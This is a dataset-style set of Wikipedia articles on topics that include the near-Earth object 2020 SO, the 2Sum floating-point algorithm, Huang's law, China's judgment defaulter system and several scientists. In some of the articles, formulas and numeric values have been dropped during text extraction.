65,371,640 | https://en.wikipedia.org/wiki/2020%20SO | 2020 SO is a near-Earth object identified to be the Centaur upper stage used on 20 September 1966 to launch the Surveyor 2 spacecraft. The object was discovered by the Pan-STARRS 1 survey at the Haleakala Observatory on 17 September 2020. It was initially suspected to be an artificial object due to its low velocity relative to Earth and later on the noticeable effects of solar radiation pressure on its orbit. Spectroscopic observations by NASA's Infrared Telescope Facility in December 2020 found that the object's spectrum is similar to that of stainless steel, confirming the object's artificial nature. Following the object's confirmation as space debris, the object was removed from the Minor Planet Center's database on 19 February 2021.
Overview
As it approached Earth, the trajectory indicated the geocentric orbital eccentricity was less than 1 by 15 October 2020, and the object became temporarily captured on 8 November when it entered Earth's Hill sphere. It entered via the outer Lagrange point and will exit via Lagrange point . During its geocentric orbit around Earth, 2020 SO made a close approach to Earth on 1 December 2020 at a perigee distance of approximately . It also made another close approach on 2 February 2021, at a perigee distance of approximately . Since discovery the time of uncertainty for February 2021 closest approach to Earth was reduced from ±3 days to less than 1 minute. It left Earth's Hill sphere at around 8 March 2021.
Paul Chodas of the Jet Propulsion Laboratory suspects 2020 SO of being the Surveyor 2 Centaur rocket booster, launched on 20 September 1966. The Earth-like orbit and low relative velocity suggest a possible artificial object. Spectroscopy may help determine if it is covered in white titanium dioxide paint. Goldstone radar will make bistatic observations transmitting from the 70-meter DSS-14 and receiving at the 34-meter DSS-13. As a result of the bistatic DSS-14/RT-32 radar observations, a rotation period of about 9.5 seconds was obtained, which corresponds to the photometric observations. Obtained range-Doppler radar images confirm that the object has an elongated shape with a length of about 10 meters and a width of about 3 meters.
Around the time of closest approach on 1 December 2020, the object was only brightened to about apparent magnitude 14.1, and required a telescope with roughly a 150mm (6") objective lens to be seen visually. It displays a large light curve amplitude of 2.5 magnitudes, signifying a highly elongated shape or albedo variations on its surface. It has a rotation period of approximately 9 seconds.
At the time of its discovery, 2020 SO had unremarkable motion typical of a main-belt asteroid. However, the four observations that Pan-STARRS obtained over the course of 1.4 hours showed non-linear motion due to the rotation of the observer around Earth's axis, which is a signature of a nearby object.
In January and February 2036, it will again approach Earth with a geocentric eccentricity less than 1 since the relative velocities will be small, but will not be within Earth's Hill sphere of .
See also
J002E3 – a near-Earth object discovered in 2002 that was identified as the S-IVB third stage of the Apollo 12 Saturn V rocket
WT1190F – temporarily orbiting space debris that entered Earth's atmosphere in 2015
– an artificial object discovered in a temporary orbit around Earth in 2018, now suspected to be the Snoopy module from Apollo 10
6Q0B44E – another artificial object discovered in orbit around Earth in 2018
Space debris
Temporary satellite
Notes
References
External links
"Pseudo-MPEC" for 2020 SO = Surveyor 2 Centaur, Bill Gray, Project Pluto, 31 January 2021
Earth May Have Recaptured a 1960s-Era Rocket Booster, Tony Greicius, NASA, 12 November 2020
Animation of the Line of Variation (via clone orbits) stretching out from December 2020 to May 2021
01 Dec 2020 image and rotation – Virtual Telescope Project / G. Masi
01 Dec 2020 time-lapse and photometry – Virtual Telescope Project / G. Masi
Minor planet object articles (unnumbered)
Claimed moons of Earth
Space debris
20200917
20200917
Rocket stages
Atlas (rocket family)
Surveyor program (NASA) | 2020 SO | [
"Technology"
] | 882 | [
"Space debris"
] |
65,372,852 | https://en.wikipedia.org/wiki/WD%201856%2B534 | WD 1856+534 is a white dwarf located in the constellation of Draco. At a distance of about from Earth, it is the outer component of a visual triple star system consisting of an inner pair of red dwarf stars, named G229-20. The white dwarf displays a featureless absorption spectrum, lacking strong optical absorption or emission features in its atmosphere. It has an effective temperature of , corresponding to an age of approximately 5.8 billion years. WD 1856+534 is approximately half as massive as the Sun, while its radius is much smaller, being 40% larger than Earth.
Planetary system
The white dwarf is known to host one exoplanet, WD 1856+534 b, in orbit around it. The exoplanet was detected through the transit method by the Transiting Exoplanet Survey Satellite (TESS) between July and August 2019. An analysis of the transit data in 2020 revealed that it is a Jupiter-like giant planet with a radius over ten times that of Earth's, and orbits its host star closely at a distance of 0.02 astronomical units (AU), with an orbital period 60 times shorter than that of Mercury around the Sun.
The unexpectedly close distance of the exoplanet to the white dwarf implies that it must have migrated inward after its host star evolved from a red giant to a white dwarf, otherwise it would have been engulfed by its star. This migration may be related to the fact that WD 1856+534 belongs to a hierarchical triple-star system: the white dwarf and its planet are gravitationally bound to a distant companion, G 229–20, which itself is a binary system of two red dwarf stars. Gravitational interactions with the companion stars may have triggered the planet's migration through the Lidov–Kozai mechanism in a manner similar to some hot Jupiters. An alternative hypothesis is that the planet instead has survived a common envelope phase. In the latter scenario, other planets engulfed before may have contributed to the expulsion of the stellar envelope. JWST observations seem to disfavour the formation via common envelope and instead favour high eccentricity migration.
The planetary transmission spectrum obtained with GTC OSIRIS is gray and featureless, likely because of the high level of hazes. The transmission spectrum was also obtained with Gemini GMOS. It does not show any features beside a possible dip at 0.55 μm. This feature could be caused be auroral emission at the nightside of the planet. The research find a minimum mass of 0.84 by accounting for the transit geometry of a grazing transit. The researchers also revised the white dwarf parameters and found a total age of 8-10 billion years, in agreement with the system belonging to the thin disk.
A search with transit timing variations found no additional planets. The search exclude planets with a mass more than 2 with orbital periods as long as 500 days and planets with >10 with orbital periods as long as 1000 days.
See also
WD 1145+017, a white dwarf with a transiting disrupted planetary-mass object
WD J0914+1914, a white dwarf with a disk of debris originating from a possible giant planet
ZTF J0139+5245, another white dwarf with a disk of debris from a disrupted planetary-mass object
CWISEP J1935-1546 a free-floating object with aurora emission in the infrared
List of exoplanets and planetary debris around white dwarfs
Notes
References
External links
NASA Missions Spy First Possible ‘Survivor’ Planet Hugging White Dwarf Star, Sean Potter, NASA, 16 September 2020
Planet discovered transiting a dead star, Steven Parsons, Nature News and Views, 16 September 2020
White dwarfs
Astronomical objects discovered in 2020
Draco (constellation)
Planetary systems with one confirmed planet
Gas giants
1690, TOI | WD 1856+534 | [
"Astronomy"
] | 775 | [
"Constellations",
"Draco (constellation)"
] |
65,373,517 | https://en.wikipedia.org/wiki/2Sum | 2Sum is a floating-point algorithm for computing the exact round-off error in a floating-point addition operation.
2Sum and its variant Fast2Sum were first published by Ole Møller in 1965.
Fast2Sum is often used implicitly in other algorithms such as compensated summation algorithms; Kahan's summation algorithm was published first in 1965, and Fast2Sum was later factored out of it by Dekker in 1971 for double-double arithmetic algorithms.
The names 2Sum and Fast2Sum appear to have been applied retroactively by Shewchuk in 1997.
Algorithm
Given two floating-point numbers and , 2Sum computes the floating-point sum rounded to nearest and the floating-point error so that , where and respectively denote the addition and subtraction rounded to nearest.
The error is itself a floating-point number.
Inputs floating-point numbers
Outputs rounded sum and exact error
return
Provided the floating-point arithmetic is correctly rounded to nearest (with ties resolved any way), as is the default in IEEE 754, and provided the sum does not overflow and, if it underflows, underflows gradually, it can be proven that
A variant of 2Sum called Fast2Sum uses only three floating-point operations, for floating-point arithmetic in radix 2 or radix 3, under the assumption that the exponent of is at least as large as the exponent of , such as when
Inputs radix-2 or radix-3 floating-point numbers and , of which at least one is zero, or which respectively have normalized exponents
Outputs rounded sum and exact error
return
Even if the conditions are not satisfied, 2Sum and Fast2Sum often provide reasonable approximations to the error, i.e. , which enables algorithms for compensated summation, dot-product, etc., to have low error even if the inputs are not sorted or the rounding mode is unusual.
More complicated variants of 2Sum and Fast2Sum also exist for rounding modes other than round-to-nearest.
See also
Kahan summation algorithm
Round-off error
Double-double arithmetic
References
Computer arithmetic
Floating point
Numerical analysis | 2Sum | [
"Mathematics"
] | 446 | [
"Computational mathematics",
"Computer arithmetic",
"Arithmetic",
"Mathematical relations",
"Numerical analysis",
"Approximations"
] |
65,374,549 | https://en.wikipedia.org/wiki/Monique%20Chyba | Monique Chyba (born 1969) is a control theorist who works as a professor of mathematics at the University of Hawaiʻi at Mānoa. Her work on control theory has involved the theory of singular trajectories, and applications in the control of autonomous underwater vehicles. More recently, she has also applied control theory to the prediction and modeling of the spread of COVID-19 in Hawaii.
Education and career
Chyba's parents Mirek and Jana Chyba were Czech, but settled in Geneva, Switzerland. Chyba earned a Ph.D. through the University of Burgundy in Dijon, France, in 1997, while working as a teaching assistant at the University of Geneva. Her dissertation, Le Cas Martinet en Geometrie Sous-Riemannienne [the Martinet case in sub-Riemannian geometry], was supervised by Bernard Bonnard.
After postdoctoral research at Pierre and Marie Curie University, Harvard University, INRIA Sophia Antipolis, Princeton University, and the University of California, Santa Cruz, she joined the University of Hawaiʻi faculty in 2002. and was promoted to full professor in 2012.
Book
Chyba is an author of the book Singular Trajectories and their Role in Control Theory (with Bernard Bonnard, Springer, 2003).
Recognition
In 2014, Chiba University in Japan gave Chyba their Science and Lectureship Award.
References
External links
Home page
1969 births
Living people
Women mathematicians
University of Hawaiʻi at Mānoa faculty
Control theorists
University of Burgundy alumni | Monique Chyba | [
"Engineering"
] | 312 | [
"Control engineering",
"Control theorists"
] |
65,380,208 | https://en.wikipedia.org/wiki/Samsung%20Galaxy%20M51 | The Samsung Galaxy M51 is a mid-range Android smartphone manufactured by Samsung Electronics as part of their M series. It was announced in late August 2020 and released the following month. The phone has a 6.7 in sAMOLED Plus display, a 64 MP quad-camera setup, and a 7000 mAh battery. It is primarily derived from the Samsung Galaxy A71 in terms of design and specifications.
Specifications
Hardware
The Samsung Galaxy M51 has a Super AMOLED Plus Infinity-O Display with a 1080 × 2400 resolution, a 20:9 aspect ratio, and a pixel density of ~385 ppi. The phone comes with 128 GB of internal storage, as well as either 6 or 8 GB of RAM. The storage can be expanded via microSD. The phone is powered by the Qualcomm SDM730 Snapdragon 730G (8 nm) paired with the Adreno 618 GPU.
Battery
The Samsung Galaxy M51 has a non-removable lithium-ion with a 7000 mAh capacity. This is the highest battery capacity of any Samsung Galaxy phone as of September 2020, and significantly higher than most other widely available phones.
Cameras
The Samsung Galaxy M51 has a quad-camera setup arranged in an “L” shape in the top left corner of the back plastic. The camera setup consists of a 64 MP wide-angle camera, capable of 4K video recording, a 12 MP ultrawide camera, a 5 MP depth camera for close-up shots, and a 5 MP depth sensor for Live Focus. A single 32 MP front-facing camera is tucked into the punch-hole in the top center of the display.
Software
The Samsung Galaxy M51 comes with Android 10 with Samsung's signature One UI 2.1. In late 2021, Samsung announced that Samsung Galaxy M51 will receive Android 12 updates based on One UI 4.1.
History
The Samsung Galaxy M51 was announced on August 31, 2020. It was released the following month on September 11, 2020.
See also
Samsung Galaxy M series
Samsung Galaxy
References
M51
Mobile phones introduced in 2020
Android (operating system) devices
Galaxy M51
Phablets
Mobile phones with multiple rear cameras
Mobile phones with 4K video recording
M51 | Samsung Galaxy M51 | [
"Technology"
] | 457 | [
"Crossover devices",
"Phablets"
] |
65,380,994 | https://en.wikipedia.org/wiki/Huang%27s%20law | Huang's law is the observation in computer science and engineering that advancements in graphics processing units (GPUs) are growing at a rate much faster than with traditional central processing units (CPUs). The observation is in contrast to Moore's law that predicted the number of transistors in a dense integrated circuit (IC) doubles about every two years. Huang's law states that the performance of GPUs will more than double every two years. The hypothesis is subject to questions about its validity.
History
The observation was made by Jensen Huang, the chief executive officer of Nvidia, at its 2018 GPU Technology Conference (GTC) held in San Jose, California. He observed that Nvidia's GPUs were "25 times faster than five years ago" whereas Moore's law would have expected only a ten-fold increase. As microchip components become smaller, it became harder for chip advancement to meet the speed of Moore's law.
In 2006, Nvidia's GPU had a 4x performance advantage over other CPUs. In 2018 the Nvidia GPU was 20 times faster than a comparable CPU node: the GPUs were 1.7x faster each year. Moore's law would predict a doubling every two years, however Nvidia's GPU performance was more than tripled every two years, fulfilling Huang's law.
Huang's law claims that a synergy between hardware, software, and artificial intelligence makes the new 'law' possible. Huang said, "The innovation isn't just about chips," he said, "It's about the entire stack." He said that graphics processors especially are important to a new paradigm. Elimination of bottlenecks can speed up the process and create advantages in getting to the goal. "Nvidia is a one trick pony," Huang has said. According to Huang: "Accelerated computing is liberating, … Let’s say you have an airplane that has to deliver a package. It takes 12 hours to deliver it. Instead of making the plane go faster, concentrate on how to deliver the package faster, look at 3D printing at the destination." The object "… is to deliver the goal faster."
For artificial intelligence tasks, Huang said that training the convolutional network AlexNet took six days on two of Nvidia's GTX 580 processors to complete the training process but only 18 minutes on a modern DGX-2 AI server, resulting in a speed-up factor of 500. Compared to Moore's law, which focuses purely on CPU transistors, Huang's law describes a combination of advances in architecture, interconnects, memory technology, and algorithms.
Reception
Bharath Ramsundar wrote that deep learning is being coupled with "[i]mprovements in custom architecture". For example, machine learning systems have been implemented in the blockchain world, where Bitmain assaulted "many cryptocurrencies by designing custom mining ASICs (application-specific integrated circuits)" which had been envisioned as undoable. "Nvidia's grand achievement however is in making the case that these improvement in architectures are not merely isolated victories for specific applications but perhaps broadly applicable to all of computer science." They have suggested that broad harnessing of GPUs and the GPU stack (cf., CPU stack) can deliver "dramatic growth in deep learning architecture." "The magic" of Huang's law promise is that as nascent deep learning powered software becomes more availed, the improvements from GPU scaling and more generally from architectural improvements" will concretely improve "performance and behavior of modern software stacks."
There has been criticism. Journalist Joel Hruska writing in ExtremeTech in 2020 said "there is no such thing as Huang's Law", calling it an "illusion" that rests on the gains made possible by Moore's law; and that it is too soon to determine a law exists. The research nonprofit Epoch has found that, between 2006 and 2021, GPU price performance (in terms of FLOPS/$) has tended to double approximately every 2.5 years, much slower than predicted by Huang's law.
See also
Accelerating change
List of eponymous laws
Notes
References
External links
2018 introductions
Computer architecture statements
Digital Revolution
History of computing hardware
Rules of thumb | Huang's law | [
"Technology"
] | 894 | [
"History of computing hardware",
"History of computing",
"Digital Revolution"
] |
65,382,854 | https://en.wikipedia.org/wiki/Allophanic%20acid | Allophanic acid is the organic compound with the formula H2NC(O)NHCO2H. It is a carbamic acid, the carboxylated derivative of urea. Biuret can be viewed as the amide of allophanic acid. The compound can be prepared by treating urea with sodium bicarbonate:
H2NC(O)NH2 + NaHCO3 → H2NC(O)NHCO2H + NaOH
The anionicconjugate base, H2NC(O)NHCO2−, is called allophanate. Salts of this anion have been characterized by X-ray crystallography. The allophanate anion is the substrate for the enzyme allophanate hydrolase.
Allophanate esters arise from the condensation of carbamates.
References
Ureas
Functional groups
Carbamates | Allophanic acid | [
"Chemistry"
] | 190 | [
"Organic compounds",
"Functional groups",
"Ureas"
] |
65,383,414 | https://en.wikipedia.org/wiki/Shelf-break%20front | Shelf-Break Fronts are a process by which stratification of the water column occurs. This stratification normally results in thermoclines, since they occur where a sudden change in water depth causes a constriction of the current flow. They can be expressed as a ratio of their potential energy due to maintaining mixed (non-stratified) conditions, to the dissipated energy produced by the current being forced across the sudden change in depth. This can be expressed as:
The energy terms can be expressed in very detailed equations, but with constant terms factored out, the important terms are water velocity (average velocity, ) and water depth (h).
The equation for the stratification index can be expressed as:
Where is a friction coefficient, approximated as 0.003 for a sandy bottom. This index can be calculated for any coastal region, usually in the range of +3 (highly stratified) to -2 (highly turbulent).
Reason to calculate
The stratification index for a Shelf Break Front is an indication of how productive phytoplankton will be. When the stratification index is approximately 1.5, this produces a nutrient-rich environment for the growth of phytoplankton. Too much higher, and the stratification of the water column will not cause the upwellings of nutrients needed for the phytoplankton to prosper, too much lower, and the water will be too turbulent for the phytoplankton to use the nutrients available.
Stability of the front, in addition to nutrients, is a key to phytoplankton production.
An illustration of the stratification index for Narragansett Bay is shown here, with the average speeds estimated, using actual bathymetry for the bay, and an estimated for silt, which composes much of the bay's bottom. Using the Stokes Spreadsheet, and some customization on the size of silt particles, I used a = 0.0011. More accurate speed measurements and detailed values for the Bay's bottom could yield a higher fidelity image.
Notice the green color (a stratification index of approximately 1.5) along the edges of the Northern Bay and near some of the islands. These areas are favorable to the formation of algal blooms in the Narraganset Bay habitat due to the stratification index being approximately 1.5. Algae have been observed in high concentration in some of these areas, but not all of them.
Using flow cytometry, results have determined that the relative abundance of picophytoplankton (< 2 m), small nanophytoplankton (2 to 10 m) and large nanophytoplankton (10-20 m) are greatly affected by the stratification index of the water column. Cell diversity was greatest in the presence of moderate levels of stratification.
If the turbulence is too high, their numbers remain stable or fall, but if there is no turbulence, their numbers do fall. It is postulated that the nutrient-rich boundary layer around each phytoplankton cell is not exhausted, but renewed, by this moderate level of turbulence.
References
Thermodynamics
Algae
Plankton
Narragansett Bay
Fluid dynamics
Water quality indicators | Shelf-break front | [
"Physics",
"Chemistry",
"Mathematics",
"Engineering",
"Biology",
"Environmental_science"
] | 682 | [
"Algae",
"Dynamical systems",
"Chemical engineering",
"Water pollution",
"Water quality indicators",
"Thermodynamics",
"Piping",
"Fluid dynamics"
] |
65,383,730 | https://en.wikipedia.org/wiki/PolyAnalyst | PolyAnalyst is a data science software platform developed by Megaputer Intelligence that provides an environment for text mining, data mining, machine learning, and predictive analytics. It is used by Megaputer to build tools with applications to health care, business management, insurance, and other industries. PolyAnalyst has also been used for COVID-19 forecasting and scientific research.
Overview
PolyAnalyst's graphical user interface contains nodes that can be linked into a flowchart to perform an analysis. The software provides nodes for data import, data preparation, data visualization, data analysis, and data export. PolyAnalyst includes features for text clustering, sentiment analysis, extraction of facts, keywords, and entities, and the creation of taxonomies and ontologies. Polyanalyst supports a variety of machine learning algorithms, as well as nodes for the analysis of structured data and the ability to execute code in Python and R. PolyAnalyst also acts as a report generator, which allows the result of an analysis to be made viewable by non-analysts. It uses a client–server model and is licensed under a software as a service model.
Business Applications
Insurance
PolyAnalyst was used to build a subrogation prediction tool which determines the likelihood that a claim is subrogatable, and if so, the amount that is expected to be recovered. The tool works by categorizing insurance claims based on whether or not they meet the criteria that are needed for successful subrogation. PolyAnalyst is also used to detect insurance fraud.
Health care
PolyAnalyst is used by pharmaceutical companies to assist in pharmacovigilance. The software was used to design a tool that matches descriptions of adverse events to their proper MedDRA codes, determines if side effects are serious or non-serious, and to set up cases for ongoing monitoring if needed. PolyAnalyst has also been applied to discover new uses for existing drugs by text mining ClinicalTrials.gov, and to forecast the spread of the COVID-19 virus in the United States and Russia.
Business management
PolyAnalyst is used in business management to analyze written customer feedback including product review data, warranty claims, and customer comments. In one case, PolyAnalyst was used to build a tool which helped a company monitor its employees' conversations with customers by rating their messages for factors such as professionalism, empathy, and correctness of response. The company reported to Forrester Research that this tool had saved them $11.8 million annually.
SKIF Cyberia Supercomputer
PolyAnalyst is run on the SKIF Cyberia Supercomputer at Tomsk State University, where it is made available to Russian researchers through the Center for Collective Use (CCU). Researchers at the center use PolyAnalyst to perform scientific research and to management the operations of their universities. In 2020, researchers at Vyatka State University (in collaboration with the CCU) performed a study in which PolyAnalyst was used to identify and reach out to victims of domestic violence through social media analysis. The researchers scraped the web for messages containing descriptions of abuse, and then classified the type of abuse as physical, psychological, economic, or sexual. They also constructed a chatbot to contact the identified victims of abuse and to refer them to specialists based on the type of abuse described in their messages. The data collected in this study was used to create the first ever Russian-language corpus on domestic violence.
References
External links
Text mining
Data mining and machine learning software
Reporting software
Software associated with the COVID-19 pandemic
Business software
Software frameworks
Text analysis
Proprietary software
Natural language processing software
Data analysis software
Data and information visualization software
Computing platforms
Data management software
Knowledge management
1994 software
Ontology editors
Windows software | PolyAnalyst | [
"Technology"
] | 766 | [
"Computing platforms"
] |
72,514,837 | https://en.wikipedia.org/wiki/Judgment%20defaulter | In China, judgment defaulter () or court defaulters, commonly known as laolai () or untrustworthy person (), is defined as a person who is able to fulfill legal obligations determined by the court, but has refused to do so, or illegally tries to evade enforcement such as hiding their assets.
According to the relevant regulations, persons who receive default judgment by the People's Courts are subject to restrictions on "high spending" or "high consumption" that are unrelated to basic living or business activities. These can include bans from traveling on high speed trains, or not being able to have your children go to private schools. Jeremy Daum, a senior research fellow at Yale Law School's Paul Tsai China Center, explains that the idea is that since the majority of "court awards" are going to be monetary, the "judgement defaulters" should not be continuing to be spending a lot of money if they have not yet paid back the court award, and instead their money should be spent to "fix that problem".
Background
According to statistics from the Supreme People's Court, the number of the cases concluded by People's Courts at all levels from 2008 to 2012 in which the defendant had property, more than 70 percent of the defendants had evaded, avoided or even violently resisted enforcement, and less than 30 percent of them had automatically fulfilled their obligations. It is also reported that the chronic problems caused by the laolai have seriously affected the harmony and stability of society. To this end, at the end of August 2013, the Supreme People's Court issued Several Provisions on the Publication of Information on the List of Judgement Defaulters.
Inclusion procedure
Subject of disciplinary action
According to the Decision of the Supreme People's Court on Amending the Several Provisions of the Supreme People's Court on the Publication of Information on the List of Judgment Defaulters in Default of Trust adopted at the 1582nd meeting of the Judgment Committee of the Supreme People's Court on July 1, 2013, and amended according to the 1707th meeting of the Judgment Committee of the Supreme People's Court on January 16, 2017, the Supreme People's Court on the Publication of Information on the List of judgment defaulters in Default provides that the people's courts at all levels shall list judgment defaulters and impose credit discipline on them in accordance with the law:
Those who have the ability to perform but refuse to fulfill their obligations as determined by the legal instruments in force.
Obstructing or resisting judgment order by falsifying evidence, violence, threats, etc.
Evading judgment order by means of false litigation, false arbitration, concealing or transferring property.
Violation of the property reporting system.
Violation of consumption restriction order.
Refusing to fulfill the judgment order settlement agreement without justifiable reasons.
According to the Regulations, the period of inclusion in the list of persons who have failed to trust is two years. When the judgment defaulter has engaged in violence, threats to obstruct, resisted the implementation, or if the circumstances are particularly serious or the judgment defaulter has a number of breaches of trust, the period can be extended by 1 to 3 years. In addition, the people's courts at all levels shall not include the judgment defaulter in the list under one of the following circumstances, in accordance with the provisions of Article 1, paragraph 1:
Where sufficient and effective security has been provided.
Where the property is subject to seizure, attachment, freezing, etc. is sufficient to satisfy the debts determined by the legal documents in force.
Where the order of performance of the judgment defaulter is later, for which enforcement shall not be enacted according to law.
Other circumstances that do not belong to the ability to perform but refuse to fulfill the obligations determined by the effective legal documents.
In addition, if the judgment defaulter is a minor, the people's courts at all levels shall not include him/her in the list of judgment defaulters.
Information publicity
According to the Several Provisions of the Supreme People's Court on the Publication of Information on the List of Judgement Defaulters, the recorded and published information on the list of judgment defaulters shall include the following:
The name, unified social credit code (or organization code), and the name of the legal representative or person in charge of the legal person or other organization that is the defaulter.
The name, gender, age, and ID number of the natural person who is the judgment defaulter.
The obligations as determined by the effective legal documents and the performance of the judgment defaulter.
The specific circumstances of the judgment defaulter's breach of trust.
The production unit and document number of the basis of enforcement, the enforcement case number, the time of filing, and the enforcement court.
Other matters that the People's Court believes should be recorded and published that do not involve state secrets, commercial secrets, or personal privacy.
On October 24, 2013, the information publication and query platform of the list of judgment defaulters of the national courts (now China Defaulter Information Public Notification) was opened to the public. The public can input the name or name of the judgment defaulter to inquire about the information of the judgment defaulter, and the above information is announced to the public. In addition, local courts can also publish information on the list of judgment defaulters through bulletin boards, newspapers, radio, television, the Internet, and press conferences. In recent years there have also been court publicity of judgment defaulters through cinema screenings of films, and the information on the list of judgment defaulters is published in the form of Douyin and other social media. In July 2014, the Executive Bureau of the Supreme People's Court and People's Daily Online jointly launched the Ranking of Judgment Defaulter.
Disciplinary measures
According to the Several Provisions of the Supreme People's Court on the Publication of Information on the List of Judgment Defaulter in Default of Trust, the Judgment Defaulter in default of trust will be subject to credit discipline in government procurement, bidding and tendering, administrative approval, government support, financing and credit, market access, qualification recognition, etc. According to the Decision of the Supreme People's Court on Amending the Several Provisions of the Supreme People's Court on Restricting High Consumption of Judgment Defaulter adopted at the 1487th Session of the Judicial Committee of the Supreme People's Court on May 17, 2010, and Amended in accordance with the Decision of the Supreme People's Court on Amending Certain Provisions of the Supreme People's Court on Restricting the High Consumption of the Judgment Defaulter adopted at the 1657th Meeting of the Judicial Committee of the Supreme People's Court on July 6, 2015 Supreme People's Court on Restricting the High Consumption of the Judgment Defaulter and Related Consumption Several Provisions on Consumption" stipulates that persons (natural persons) included in the list of judgment defaulters shall not engage in the following acts of high consumption and consumption not essential to life and work:
Choosing airplanes, soft sleepers on trains, ships of second class or higher when taking transportation.
High spending at hotels, hotels, nightclubs, golf courses, etc. above star level.
Buying real estate or building new, expanded, or high-grade renovated houses.
Leasing high-grade office buildings, hotels, apartments and other places for office work.
Purchase of non-business essential vehicles.
Travel, vacation.
Children attending high-priced private schools.
Paying high premiums for insurance and financial products.
Riding all seats of G trains, first-class or above seats of other trains, and other consumption behaviors that are not necessary for life and work. (The regulation applies to all train trips of China National Railway Group in the Mainland and Hong Kong)
In addition to the above measures, the judgment defaulter included in the list see their housing, bank accounts, pension, mobile payment accounts (such as Alipay, WeChat Pay, etc.) frozen and seized, and the judgment defaulter is not allowed to serve as the legal representative, director, supervisor, and senior management of any company nationwide, nor be allowed to enroll his or her children in private schools, and their speculation in stocks, leaving the country, taking out loans or applying for credit cards in financial institutions will also be restricted. At the same time, vehicles under the defaulter's name are not allowed to drive into the Expressways of the People's Republic of China, and once a vehicle under the defaulter's name enters or leaves an expressway toll booth, the vehicle will be suspended and transferred to the court by the highway enforcement brigade. According to the Criminal Law of the People's Republic of China Amendment (IX), which was implemented on November 1, 2015, people's court judgments and rulings have the ability to perform but refuse to do so, will be punished with "refusal to take action called by the judgment. For serious circumstances, the penalty shall be imprisonment for up to three years, detention, or a fine; if the circumstances are particularly serious, the penalty shall be imprisonment for a term of more than three years and up to seven years and a fine.
Since July 2015, Zhima Credit, a subsidiary of Ant Group, and the Supreme People's Court have realized a system connection to update the data of judgment defaulters in real time. Once an Alipay user is included in the list of judgment defaulters, their Sesame Credit score will be deducted, and their consumption and shopping at Sesame Credit's merchant partners will also be restricted. In addition, there are also some places that cooperate with communication operators to set up exclusive colored ring for the judgment defaulter, and the opening cannot be canceled without the consent of the court. If the public calls the phone number under the name of the judgment defaulter, an alert will be reported that the owner is listed as a judgment defaulter. In Beijing, people who are included in the list of judgment defaulters are not allowed to participate in the minibus lottery.
According to a press conference held by the Supreme People's Court on July 10, 2018, as of July 2018, there were 7.89 million cases of judgment defaulters in mainland China under publication, involving 4.4 million judgment defaulters. In terms of punishment, 12.22 million people have been restricted from purchasing air tickets, 4.58 million people have been restricted from purchasing tickets for moving trains and high-speed trains, and 280,000 people have been restricted from serving as legal representatives and executives of enterprises. Nationwide, 2.8 million judgment defaulters are forced to fulfill their obligations automatically due to the pressure of credit discipline.
Notable people
Prominent persons included in the list of judgment defaulter judgment defaulters
Huang Hongming, former chairman of Guangdong Chuang Hong Group. 2014, he was listed on the list of judgment defaulters for violating the property reporting system
Jia Yueting (), founder and former chairman of LeEco. listed as a judgment defaulter by the Beijing Third Intermediate People's Court on December 11, 2017
Xu Zongheng (), former mayor of Shenzhen Municipal People's Government, was sentenced to a suspended death sentence for taking bribes in 2011. He was later included in the list of judgment defaulters by the Zhengzhou Central Court on July 17, 2018, for failing to fulfill his obligation to "forfeit all his personal property" as determined by the effective legal instrument
Sun Huahua, former chairman of the board of directors of Dahua New Material, a New Third Board company, applied for resignation as chairman of the board of directors in March 2018 due to personal inclusion as a judgment defaulter
Dai Wei, founder and CEO of OFO. Listed by the Beijing Haidian District People's Court on December 4, 2018, as a judgment defaulter
Michelle Ye, actress, was included in the list of judgment defaulters by Shanghai Xuhui District People's Court in December 2018 and fined RMB 80,000 yuan on March 5, 2019, for refusing to fulfill her obligations
Pang Qingnian (), chairman of the Board of Directors of China Youth Automobile Group. As of May 2019, has been listed as a judgment defaulter by the court 8 times
Shi Hongliu, the chairman of Hosa International, is listed by the court as a judgment defaulter
Jiang Peizhen, the founder and chairman of Golden Voice Holding Group Co. Ltd Listed as a judgment defaulter by Shanghai No. 1 Intermediate People's Court and Ningbo Yinzhou District People's Court for defaulting on 51,949,800 yuan in advertising fees and failing to fulfill financial loan contracts
Luo Yonghao, CEO of Smartisan, was listed as a judgment defaulter by the court for failing to fulfill the payment obligations determined by the effective legal documents
马平 , CEO of Jiangsu Heryo Group、宾利车主,listed as a judgment defaulter by Zhangjiagang City People's Court on July 16, 2019, for violating the property reporting system
See also
Default judgment
Blacklisting
Blacklist (employment)
Chinese social relations
Reputation capital
Reputation management
Reputation system
Social issues in China
Social Credit System
References
External links
網易-湖北法院公布重大老賴名單
Credit
Mass surveillance
Data
Reputation management
Credit scoring
Nudge theory
Social status
Social systems
Social influence
Politics of China
Social information processing
Information society
Government by algorithm
Human rights abuses in China | Judgment defaulter | [
"Technology",
"Engineering"
] | 2,716 | [
"Information society",
"Government by algorithm",
"Automation",
"Information technology",
"Data",
"Computing and society"
] |
72,516,025 | https://en.wikipedia.org/wiki/Gerard%20Meijer | Gerardus Johannes Maria Meijer (born 1962 in Zeddam), more often Gerard J. M. Meijer is a Dutch physicist who has made significant contributions in the field of molecular physics, with a particular focus on laser-based spectroscopic detection techniques and cold molecules. His group invented the technique of Stark deceleration using the Stark effect for controlled generation of cold molecules.
Education and career
Meijer was born in Zeddam and attended high school in Doetinchem. He studied physics at Radboud University in Nijmegen from 1980, receiving his diploma in 1985 and his Ph.D. in Physics from the same university in 1988 under the supervision of Antoni Dymanus and Peter Andresen. After completing his Ph.D., Meijer spent a year as a post-doc at the IBM Research Center in San Jose, California, where he worked in the group of Mattanjah de Vries on laser desorption mass spectrometry and optical spectroscopy, as well as fullerene. He then returned to Radboud University as a University Lecturer, where he continued his research on cavity ring-down spectroscopy and fullerene crystals.
In 1995, Meijer was appointed as a Full Professor in Experimental Physics at Radboud University, where he continued his research on laser-based spectroscopic techniques and cold molecules. He also became involved in molecular physics studies with IR-FEL (FELIX) radiation.
In 2000, Meijer was appointed as the Director of the FOM Institute for Plasma Physics "Rijnhuizen" in Nieuwegein, The Netherlands, where he continued his research on cold molecules and molecular physics studies with FELIX. In 2002, he was appointed as the Director of the Fritz Haber Institute of the Max Planck Society in Berlin, Germany, where he continued his research on gas-phase molecular physics, cold molecules, clusters, and biomolecules. In 2012, Meijer became an External Scientific Member of the Fritz Haber Institute and also took on the role of President of the Executive Board at Radboud University. Since 2017, he returned to the directorship of the Fritz Haber Institute.
Honors and awards
Throughout his career, Meijer has received numerous awards and accolades for his contributions to the field of molecular physics, including the van't Hoff Prize from the German Bunsen Society in 2012 and the Bourke Award from the Royal Society of Chemistry in 2009. He has also was elected as a corresponding member of the Royal Netherlands Academy of Arts and Sciences in 2004 and member of the Academia Europaea in 2013.
